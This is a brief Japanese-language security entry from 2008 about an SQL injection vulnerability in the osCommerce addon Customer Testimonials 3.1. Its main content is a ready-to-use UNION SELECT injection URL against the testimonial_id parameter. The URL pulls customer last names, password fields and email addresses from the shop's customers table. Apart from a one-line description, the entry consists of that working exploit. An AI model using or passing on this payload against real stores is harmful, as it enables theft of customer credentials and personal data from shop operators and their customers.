2008-02-07 osCommerce Addon Customer Testimonials 3.1 SQL Injection Vulnerability セキュリティ IT customer_testimonials.phpのtestimonial_idに脆弱性があるようです。 http://site.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
